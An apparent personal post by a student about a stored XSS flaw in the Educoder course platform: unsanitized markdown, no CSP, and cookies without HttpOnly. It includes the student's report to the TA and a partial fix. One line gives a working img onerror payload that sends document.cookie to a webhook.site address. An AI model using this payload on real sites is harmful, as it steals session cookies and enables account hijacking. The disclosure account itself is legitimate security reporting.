Regarding the Educoder platform mentioned before, the platform is very problematic.

It doesn't have any CSP policies, you can input markdown to it, and I discovered this when it rendered images directly from my CDN in markdown.

Basically it have a markdown on the left and rendering HTML on the left, but it fails to sanitize the inputs. Also the cookie isn't HTTP Only, so if I input

<img src="invalid" onerror="fetch('https://webhook.site/...'+document.cookie)">

It will successfully post the person's cookie to the malicious site. There is only one cookie called _educoder__session, so I literally logged in.

The point is the school's platform is so very shitty and lacks all security measures, and I could theoretically hijack the TA's cookie and login easily, although I wouldn't ever do that because of consequences.

Anyways, I told the TA privately about this case. This is a class platform, and I got no idea who to contact.

Then I opened an issue and after 3 days the school fixed it, but only partially, by using httponly cookies and adding a CSP policy, so you can't steal the cookies anymore. But JavaScript can still execute, which leaves a lot of vulnerability, though more noticeable for TAs and harder to succeed for attackers.

Anyway, I quitted the course later after the mid-term. So it's very, very sad.